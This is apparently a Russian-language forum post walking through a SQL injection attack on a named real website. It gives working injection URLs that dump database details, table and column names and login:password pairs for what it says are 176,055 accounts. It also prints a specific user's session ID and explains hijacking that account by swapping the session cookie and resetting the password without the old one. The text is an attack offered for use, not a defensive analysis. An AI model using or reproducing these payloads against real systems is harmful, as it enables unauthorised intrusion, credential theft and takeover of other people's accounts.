geometria.ru
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4, 5,concat_ws(0x3a,database(),user(),version()),7/*
geometria:geometria@client131-18.cmk.ru:5.0.45-log
Идем в information_schema.
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4, 5,table_name,7+from+information_schema.tables/*
Интересная таблица "user"
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4, 5,column_name,7+from+information_schema.columns+wh ere+table_name=0x75736572/*
Мне понравились колонки:
login,password =)
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4, 5,concat_ws(0x3a,login,password),7+from+user+limit +1,500/*
Выводим первые 500 из базы.Всего на данные момент
176055 рабочих аакаунтов.
Пароль захеширован хз чем может md5 с солью,но колонку с ней не нашел,а нам и не нада.))
И так выбираем пользователя,например "
Fusion".
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4, 5,concat_ws(0x3a,login,session_id),7+from+user+whe re+login=0x467573696F6E/*
Fusion:mfjrhju2pua8lj4ob7k3n20e81
Итакс,хорошо.Дальше если зареганы заходим в редактирование cookies.Меняем PHPSESSID,ок,F5 и вот мы под чужим логином. Жмем на наш логин попадаем на страницу с инфой пользователя,жмем на изменить данные.Фишка в том что при смене пароля не запрашивает старый пароль) поэтому 2 раза вводим новый пароль потом "изменить" и все.=)